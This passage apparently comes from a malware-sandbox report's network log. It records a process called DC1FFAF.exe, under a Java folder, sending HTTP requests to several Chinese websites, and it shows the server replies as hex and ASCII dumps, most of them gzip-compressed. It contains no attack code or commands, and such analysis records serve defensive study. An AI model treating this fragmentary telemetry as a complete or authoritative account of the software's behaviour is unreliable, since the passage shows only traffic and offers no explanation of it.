                                                                                                                                    Data Ascii: bdciKrmCS]<Oqt7YUHiGVhlEvI3)[j%EhO#"3 %3z2+~+[;GJo%^R=m{Nw9Llc?
                                                                                                                                    Aug 6, 2024 10:30:02.640259027 CEST1236INData Raw: 4e 1d df 0c bd 95 84 cb 7e 3d 5f 19 7b d7 e3 0c 56 7c e6 b6 9d 51 e0 8d 9f 4f c6 7e aa ba 62 69 e1 34 75 b2 91 da 1a f4 86 ce b8 d3 e8 ca 8d ec ed 3c f7 9a 2d 6f cd 6d 8f 06 3d ef 79 4e d4 0e 7b 71 ba 57 ce 4d b0 92 e8 3b f0 7a 65 e4 f9 de 68 e4
                                                                                                                                    Data Ascii: N~=_{V|QO~bi4u<-om=yN{qWM;zehD1tz^t#US6u/'Ow?g?7_???wo/~/g?~_?
                                                                                                                                    Aug 6, 2024 10:30:02.640269995 CEST1236INData Raw: b0 1f 95 76 d9 08 81 e1 59 26 fb aa dd 19 7b 29 20 45 d7 03 1e 71 35 72 86 cf b4 65 fd 39 16 a4 04 e0 9b 2f af 1c a0 ef 19 5f 3d f4 9d 63 b5 02 58 45 cc c2 e2 4b 64 9f 01 bf 80 1d d7 e9 02 72 3a ad fe 7a 0f d8 46 d7 9b d1 3e ae 90 3b 0e 3d 21 18
                                                                                                                                    Data Ascii: vY&{) Eq5re9/_=cXEKdr:zF>;=!hT$qXxa ~f&:SH2Q8IKY,<W+pV3CR1T;P<>ydFlneEtx"g/HEYi.ws(~?r6tSS/>)qEwo
                                                                                                                                    Aug 6, 2024 10:30:02.640281916 CEST388INData Raw: 34 86 59 13 b8 d0 18 12 69 50 47 71 43 06 a9 9a d7 66 53 2b e0 1a 46 ce 6a b5 3b a8 26 bc a1 6a 42 09 c2 86 22 0d 24 9f cf 2f 06 08 a9 52 94 d1 2f 56 af c1 44 52 53 ff b5 40 cf b2 6e 53 57 5f 22 ef b6 c9 97 62 86 6a b9 5a 69 a3 f0 8c ab 07 60 77
                                                                                                                                    Data Ascii: 4YiPGqCfS+Fj;&jB"$/R/VDRS@nSW_"bjZi`woD+njyMdv7Vug^Ly4gf*berr-!a5v#gk5[ZOoY6,O8$-?gARms9.bzu?X'iS7j5'


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    36192.168.2.649762104.192.110.22680420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.285612106 CEST216OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.so.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.992607117 CEST425INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: openresty/1.15.8.3
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.so.com/
                                                                                                                                    Set-Cookie: QiHooGUID=; Max-Age=63072000; Domain=so.com; Path=/
                                                                                                                                    Data Raw: 38 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 8e<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    37192.168.2.64976349.51.65.18180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.297822952 CEST214OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: soso.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:01.913130045 CEST347INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 162
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://soso.com/
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    38192.168.2.649764163.171.132.11980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.354490995 CEST216OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.jd.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.203979015 CEST342INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: Cdn Cache Server V2.0
                                                                                                                                    Location: https://corporate.jd.com/home
                                                                                                                                    X-Via: 1.0 PSdgflkfFRA2po75:8 (Cdn Cache Server V2.0)
                                                                                                                                    X-Ws-Request-Id: 66b1df09_PSdgflkfFRA2po75_17085-54137
                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                    Aug 6, 2024 10:30:02.206187010 CEST342INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: Cdn Cache Server V2.0
                                                                                                                                    Location: https://corporate.jd.com/home
                                                                                                                                    X-Via: 1.0 PSdgflkfFRA2po75:8 (Cdn Cache Server V2.0)
                                                                                                                                    X-Ws-Request-Id: 66b1df09_PSdgflkfFRA2po75_17085-54137
                                                                                                                                    Strict-Transport-Security: max-age=31536000


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    39192.168.2.649765163.181.92.21280420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.421246052 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.1688.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.204273939 CEST466INHTTP/1.1 302 Found
                                                                                                                                    Server: Tuser
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 242
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.1688.com/
                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 72 65 73 69 64 65 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 64 65 72 20 61 20 64 69 66 66 65 72 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>302 Found</h1><p>The requested resource resides temporarily under a different URI.</p><hr/>Powered by Tuser</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    40192.168.2.649766111.124.200.10180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.538919926 CEST216OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: youdao.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:04.144637108 CEST199INHTTP/1.1 307 Temporary Redirect
                                                                                                                                    Server: YDWS
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:03 GMT
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://youdao.com/
                                                                                                                                    Data Raw: 31 33 0d 0a 68 74 74 70 73 3a 2f 2f 79 6f 75 64 61 6f 2e 63 6f 6d 2f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 13https://youdao.com/0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    41192.168.2.649767120.26.110.17080420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.598654032 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: foodmate.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.653475046 CEST1236INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    Content-Type: text/html; charset=gbk
                                                                                                                                    Last-Modified: Tue, 06 Aug 2024 08:29:51 GMT
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    ETag: W/"66b1deff-295ca"
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Data Raw: 34 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd f9 73 5a 57 d6 28 fa 7b 57 dd ff 81 8f 7e b7 e3 54 37 62 14 92 1c 5b 5d f9 92 1e f2 be ee 74 ee 4d ee bb ef 56 57 97 0b 49 c8 22 d6 d4 12 f2 90 f7 bd fb eb fb 3b 10 8e 2d c9 72 c4 8c 98 84 90 10 62 06 01 02 45 76 3c c8 43 22 47 76 62 2b f1 20 db a9 b7 d6 d9 1c 38 c0 81 73 e0 20 db f9 be 24 55 16 70 ce de 7b ad b5 d7 5e 7b ed b5 d7 70 ec 5f de ff db 7b 9f fc af 8f fe 20 1a d2 8f 0c 8b 3e fa 1f ff fa 97 0f de 13 89 25 52 e9 ff 54 be 27 95 be ff c9 fb a2 ff fb cf 9f fc f5 2f 22 79 87 4c f4 c9 84 66 74 52 a7 d7 8d 8d 6a 86 a5 d2 3f 7c 28 16 89 87 f4 fa f1 a3 52 e9 99 33 67 3a ce 28 3b c6 26 4e 4a 3f f9 ef d2 b3 d8 97 1c 1b 17 3f 4a f4 8c 96 1d 03 fa 01 71 ef af 8e 51 03 9e 1d 19 1e 9d 3c ce d2 8d bc a7 a7 87 b4 a6 de d5 6a 06 e0 cf 88 56 af 01 40 f5 e3 12 ed 3f a7 74 a7 8f 8b df 1b 1b d5 6b 47 f5 92 4f ce 8d 6b c5 a2 7e f2 ed b8 58 af 3d ab 97 62 ff ef 88 fa 87 34 13 93 5a fd f1 93 7d 0a a5 5c 21 96 42 2f 7a 9d 7e 58 db 1b b5 86 9c 9e ef 4c bb 89 a7 [TRUNCATED]
                                                                                                                                    Data Ascii: 4000sZW({W~T7b[]tMVWI";-rbEv<C"Gvb+ 8s $Up{^{p_{ >%RT'/"yLftRj?|(R3g:(;&NJ??JqQ<jV@?tkGOk~X=b4Z}\!B/z~XLef]Yo9VadyF4Ng=tsYpT3=.>=wflb`Sn8'p0!C}0+x]w4sWzgabD)vN_.g>?mRLNOq!#Az5EkI1h9Db&0H#iaF]W{N=& $FR<AJ2SqJ/Ez`bVzVB~vZ"O }ccF4IaVG/T7:=+v@$2EP~9!{cg:FcF!LhS"4E"nP4>\C&'!SsyGgcD7)?$2 GNH_|0X9Dr_5y3^"Crh|vnxL3ph9<<"R~MV
                                                                                                                                    Aug 6, 2024 10:30:02.653851986 CEST1236INData Raw: fa e9 a4 74 68 6c 44 7b a2 96 3a 95 ab 4c 8d ab 8c 21 ed da 20 28 26 4f e9 46 a5 03 da 41 cd d4 b0 5e aa d3 aa 29 71 81 42 b5 15 46 66 43 73 58 33 7a 52 fa d9 90 a4 7f 54 8a 1f db 4d 40 b2 06 a4 20 a9 07 75 ad 76 de 78 23 80 c9 19 19 eb 83 c9 6a
                                                                                                                                    Data Ascii: thlD{:L! (&OFA^)qBFfCsX3zRTM@ uvx#j_iT#3R~V7p\.~_1)k&QuI,&SD'FP3 M`i'P[G6L:h!c=&]Tk<7=3)>6[8l'h
                                                                                                                                    Aug 6, 2024 10:30:02.653971910 CEST1236INData Raw: d3 27 d0 ae 75 02 a4 13 40 56 a3 29 4c 4d 6a 27 aa 46 a9 3c 22 52 9a 38 80 a2 ec a6 84 1b 74 41 69 91 94 de c1 13 ec 93 53 60 67 d2 49 6b 81 45 4b 61 93 1d 7d ca d2 0f bd dd 4d 9e 01 0d c6 75 20 4a ec 34 d3 e9 88 46 37 3c ac 9b 84 f9 a8 21 66 e2
                                                                                                                                    Data Ascii: 'u@V)LMj'F<"R8tAiS`gIkEKa}Mu J4F7<!fzM9bK`x`zC,P~/}x(0L7 v\}gIzTVRZ\0A,m69?Y7zRaM_5nK;s[yA].yi4
                                                                                                                                    Aug 6, 2024 10:30:02.653986931 CEST1236INData Raw: a0 59 2d f2 8d 79 b1 c1 e0 94 41 ae 72 64 ba 55 ab 23 f7 14 89 9e f0 fa 1b ad 66 15 e5 b8 02 8e 2c 95 cb 0b 66 0b 1b b6 38 b8 12 85 17 b9 13 f5 2f 34 40 bb 64 c8 66 19 bd 68 c8 6e 61 81 2b 71 81 53 be c4 c9 86 c2 13 5c 58 27 c7 46 59 30 c7 76 ad
                                                                                                                                    Data Ascii: Y-yArdU#f,f8/4@dfhna+qS\X'FY0vbN2Q-@*q!"Wn*{}nC*-[W>jfky4iq`UNUFaO3U,RE)f1M7kux6b[a[vRc*
                                                                                                                                    Aug 6, 2024 10:30:02.654028893 CEST1236INData Raw: 2d a0 46 35 a8 81 9d 4f c4 4e a7 54 0e 14 eb 92 c8 80 5c 0a 49 97 82 8e d8 a1 02 6a 8a 11 3b 6f 0e c5 e8 bb 2f d0 2e 4f ea 46 25 7d 63 7a fd d8 c8 51 d9 f8 d9 77 6a f7 46 de cc a7 94 01 43 54 eb 59 2d 11 b3 8b 22 26 b0 9f 52 22 53 4a 94 3d 6c e1
                                                                                                                                    Data Ascii: -F5ONT\Ij;o/.OF%}czQwjFCTY-"&R"SJ=lO+B_FVgjefxB>y{yELVPtVC,V$)jBL9sL*eb0#}*?\PIQkRYTR)zh{>ZV.egoiC
                                                                                                                                    Aug 6, 2024 10:30:02.654042959 CEST1236INData Raw: f0 cf 6d ba c2 3b f9 10 3a 9e a6 1e 80 4a 03 db 2b d7 1b 82 a0 e3 d8 41 62 d7 c0 9c 90 26 e6 12 34 27 2c 5d f1 b9 0c a6 80 cf 3a 9f f1 38 d7 0d e6 64 34 be 43 d3 16 f2 19 ff b4 4c d9 50 50 1d 73 2e a7 ae 03 a5 05 b5 17 84 19 87 31 33 f0 cc 64 61
                                                                                                                                    Data Ascii: m;:J+Ab&4',]:8d4CLPPs.13dabe|oEw2k><!nC4\z?fl>{I5v/<{O0x/2}.S[DRL^f7s>TlL%]uM7_^]1
                                                                                                                                    Aug 6, 2024 10:30:02.654057980 CEST1236INData Raw: 0b ed ce ae 83 c0 e2 da 2c 2a d4 c8 b2 de 2b 8b 0f f3 8b d1 97 a1 eb b9 15 cf 33 f3 92 35 1f f2 89 7b f9 bd 27 08 52 0e 45 23 e3 c9 5f c5 08 3b 74 87 43 07 11 0c 41 86 f8 1e 19 b8 5e cc 80 ec 56 f4 84 37 25 40 79 15 71 95 6f e6 6d 21 50 cb 38 14
                                                                                                                                    Data Ascii: ,*+35{'RE#_;tCA^V7%@yqom!P899_0!,<#.LDa@6x~#3AqS"./AyE)O#_vv+Jr)Ze!}uGTe8*!ur/Yt,&|]* s{n
                                                                                                                                    Aug 6, 2024 10:30:02.654536009 CEST1236INData Raw: 12 b9 b7 fe 2d 23 df 41 3b bb 6d 9d 0e ca 1e be 74 f0 66 f6 e7 f7 4d ce 2b 88 68 7a 25 9d 40 85 ab 76 85 36 7a 4b 00 94 dd 5c ee 63 f4 6c d9 ef 2c 3b be fd 32 0f 33 86 70 ae ce 18 a6 5d 4e 38 1c 5c 89 24 b2 b7 6a d3 50 94 a7 a3 b9 76 82 30 e1 b8
                                                                                                                                    Data Ascii: -#A;mtfM+hz%@v6zK\cl,;23p]N8\$jPv0EL\no_6qg#Qb>-Gjzsm`c]\)WRP+YAo_NImfASqy,g<u#Os%Vh>Ks`8_>|$*hb
                                                                                                                                    Aug 6, 2024 10:30:02.654550076 CEST1236INData Raw: e4 4c 6c 51 ae b8 7f 32 9b 61 96 7c 19 f0 91 df b8 68 8d b8 2e 6c 18 b2 2f af 5d 36 cd 43 ad 0b ab f7 6e 76 35 bd 02 2a 5d be 72 da 9a 69 29 08 1b 0e 3d 99 89 cd 62 7c f7 4b 9a e2 f8 b9 90 f3 79 2c 9e f5 82 3b 91 5a c9 26 eb c9 06 be ad 04 61 d1
                                                                                                                                    Data Ascii: LlQ2a|h.l/]6Cnv5*]ri)=b|Ky,;Z&a,l\D<ro2|a#QWj%VhAVg_5%B[N]#jF:|Z2|htUp[2]Gf:Q3F>U`a!F517xOid
                                                                                                                                    Aug 6, 2024 10:30:02.654565096 CEST1236INData Raw: 45 1c fe c5 b7 e5 b5 4b be b5 da ef 6a a9 ac 53 2a eb 91 74 02 77 41 9a 93 6e b6 e2 db 8a 1e 28 9b 35 a4 45 44 8e 8b d5 50 f6 fb 70 6a bf 03 81 49 f1 77 24 22 a3 e4 bb 40 4a 41 8a b6 36 95 29 57 40 d9 77 50 05 d5 92 ce 1e 49 8f ea 4d a1 54 f1 a2
                                                                                                                                    Data Ascii: EKjS*twAn(5EDPpjIw$"@JA6)W@wPIMTZ6UJT%TDCj_sWrm~v[*SKenIWkb%iY!'Df2NkNAY@N=N!\Ns/=>;S}~k
                                                                                                                                    Aug 6, 2024 10:30:02.659780979 CEST1236INData Raw: 1a 9c 58 f2 d3 37 93 81 33 46 82 aa cd f0 1a 06 2d 4d 65 f9 02 b1 01 ad 5b 23 35 47 88 0a 6d 1a 35 38 22 be dd 4b f6 b0 d7 e1 ba bb f8 d0 e0 a4 69 85 f1 dd c4 78 5a ef 0d 6e 24 ea 31 68 a5 97 18 c3 f4 7e 58 d6 f9 61 cd 99 ca 9b df d2 dd 2a bb 25
                                                                                                                                    Data Ascii: X73F-Me[#5Gm58"KixZn$1h~Xa*%+:g\wk-D2,p[uf+j`#v&:B|H#'n-Qu(rYpli(VcsA.{-(|W+z%,8_->?ECY


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    42192.168.2.649768103.235.46.9880420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.706893921 CEST220OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.hao123.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:03.022542953 CEST1236INHTTP/1.1 200 OK
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Content-Type: text/html;charset=UTF-8
                                                                                                                                    Cxy_all: +a5554b516cdd9e1ae915848840ff2ffd
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    Lfy: gzbh.34685
                                                                                                                                    P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                    Server: nginx/1.9.12
                                                                                                                                    Set-Cookie: s_ht_pageid=16; path=/; domain=.hao123.com
                                                                                                                                    Set-Cookie: ft=1; expires=Tue, 06-Aug-2024 15:59:59 GMT
                                                                                                                                    Set-Cookie: v_pg=normal
                                                                                                                                    Set-Cookie: hz=0; path=/; domain=www.hao123.com
                                                                                                                                    Set-Cookie: BAIDUID=D17EA119710710AEC322BAC414936C01:FG=1; expires=Wed, 06-Aug-25 08:30:02 GMT; max-age=31536000; path=/; domain=.hao123.com; version=1
                                                                                                                                    Tracecode: 18024469592350097162080616
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Data Raw: 38 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 97 23 c9 75 20 f6 7d 7e 05 d8 ed 61 77 0d 91 59 48 bc 81 62 53 ec 27 39 96 86 1a 0f 87 12 b9 e4 a8 4e 02 48 54 61 1a 05 40 78 74 75 b3 a6 ce 91 f7 ac 1e d6 ca d6 ae bd bb 5e 5b f6 d9 2f f6 59 ed 9e b3 92 65 cb 7b b4 96 b8 fe 31 ab 19 52 9f fc 17 7c 1f 11 91 37 1e 99 48 54 75 f7 70 49 b1 38 33 00 32 32 e2 c6 8d 1b f7 1d 37 be fe 95 27 bf fe f8 e3 1f 7c f8 b4 76 be bd 98 7f e3 eb f8 ef da 78 9e 6e 36 0f ee dc 81 af 59 3a f9 c6 d7 17 cb cd 78 3d 5b 6d bf f1 f5 8b 6c 9b 42 cb ed 2a ca 7e 7b 37 7b f1 e0 ce 3a 9b ae b3 cd f9 9d da 78 b9 d8 66 8b ed 83 3b 8d 93 da f7 3e fa b5 07 f7 8e 7f e5 f4 54 bf 78 7a 1a 3d 48 ee dd a9 1d 7f e3 eb c7 79 67 db d9 76 9e 7d e3 3c 5d 26 cd d6 e9 df fe d5 1f fe f4 27 ff f4 6f ff fa bf fb d9 ff fb 3f fd dd ef ff d1 e7 7f f3 3b 9f ff eb 7f fc f5 63 6e f3 f5 51 ba c9 6a db 74 7d 96 c1 08 a7 a3 79 ba 78 0e d0 11 34 e3 f3 74 bd c1 9f 77 db 69 d4 bf 03 43 b8 40 7e 3f fa de c3 e8 f1 f2 62 95 6e 67 a3 79 96 83 fa fe d3 07 d9 e4 [TRUNCATED]
                                                                                                                                    Data Ascii: 896k#u }~awYHbS'9NHTa@xtu^[/Ye{1R|7HTupI83227'|vxn6Y:x=[mlB*~{7{:xf;>Txz=Hygv}<]&'o?;cnQjt}yx4twiC@~?bngy,A\(Mvfz6BLuj|_^:?3Yl&5MdggxY^;>a<{u\O6bdmw>?9['~_T7/?z?ofIddQ/_/
                                                                                                                                    Aug 6, 2024 10:30:03.022572041 CEST1236INData Raw: c7 7f f8 b3 ff fb 1f 7d f1 ff fc 93 9f fe cf ff e8 6f ff ea df 7d f1 2f 7e 5f 82 fa 9f 7e e7 1f 42 83 2f fe c7 7f ff c5 3f fb f7 9f ff e4 9f 7f fe 93 bf f8 d9 bf fe bd ff f4 3b ff f5 df fd ab ff eb 6f ff c3 3f 81 0f 9f ff 1f 7f fc b3 3f ff 4b f8
                                                                                                                                    Data Ascii: }o}/~_~B/?;o??K_?w{?T}{ogo~O|'??~#2mxSVr,/o?>>W7i:dcjmwE>_
                                                                                                                                    Aug 6, 2024 10:30:03.022584915 CEST1236INData Raw: cf c6 db fa 68 b7 dd 2e 17 fc ee 34 bd 98 cd 5f 0d 67 8b 73 30 34 b6 dc c1 06 fb b3 7e c9 e1 d5 08 58 a7 93 d9 6e 03 53 86 f9 2b ec ce d3 51 36 d7 9d 83 dd 02 9a 57 3a 57 e0 5f cc 26 93 79 76 4d f0 0c a7 cb f1 6e a3 1a aa 2f 0c 99 fa a2 97 89 bf
                                                                                                                                    Data Ascii: h.4_gs04~XnS+Q6W:W_&yvMn/^-w[k0V:FGA4[,5'?EQW9O9/$/d:sWjNQ\8[aYl=XEN;)E0Z7-hDNItNMDtOwxT7z>
                                                                                                                                    Aug 6, 2024 10:30:03.022595882 CEST1236INData Raw: 9e 46 49 5b 28 77 49 1b 68 1a 7f ec ca 1f bb f8 23 6d d3 f3 14 1c c4 bc 63 e9 e3 b0 51 23 76 55 bb 3b ed e2 1f 82 3e 9a 83 8e 40 76 d6 30 67 71 77 b3 09 fe 9d e4 6a d8 10 d4 86 a9 e2 79 a0 ef 91 30 6f 82 46 78 62 e9 9e 27 f9 b0 de 58 df 84 08 c2
                                                                                                                                    Data Ascii: FI[(wIh#mcQ#vU;>@v0gqwjy0oFxb'Xt8''KZ rD;/#RjkrQ8.MD;N2"'1?&WyN$Dr{ZgT,>2#=&z_z|cPs@vt
                                                                                                                                    Aug 6, 2024 10:30:03.022607088 CEST1236INData Raw: 32 30 d7 48 d9 f7 3d 2f 4f 9f e1 9f 6d 4c a0 29 88 3a ad 24 b8 46 f7 e8 3a a6 d8 0d 29 32 38 b8 d2 32 5a d6 a8 66 09 d5 46 a4 ed 09 6f 66 10 96 84 77 29 c0 a2 de 1c f4 91 92 6c 5b 58 ad 6f 07 fb 94 46 12 fd a0 70 28 dd 41 1e 1d da 66 46 4e 95 80
                                                                                                                                    Data Ascii: 20H=/OmL):$F:)282ZfFofw)l[XoFp(AfFN<Y4b[)j>&3^,LC!\Yv8pY3AsjG8~}?4'~(yS@uWcV;|uuV4(~(xp=(S;(v?)/p
                                                                                                                                    Aug 6, 2024 10:30:03.022617102 CEST1236INData Raw: a3 3f e9 d5 f9 ff f1 20 14 5c d2 b9 6c 41 5f 60 3e 51 88 75 a9 53 75 87 f9 ff 0a 37 c2 5b 93 c6 b7 73 d0 21 0a c1 01 07 18 44 63 58 fc bb 11 83 12 ad f4 e8 ea 6e bb 66 dc ed f4 eb 70 74 8c 3c 77 8f a3 a4 15 77 93 8e f9 a1 03 bd b6 f2 e7 ad 76 dc
                                                                                                                                    Data Ascii: ? \lA_`>QuSu7[s!DcXnfpt<wwv6N=iBwKq#8ih;;.{@CPJ.DeXKk8?(\ml|bC)U5w[(znPoy%R/-wR
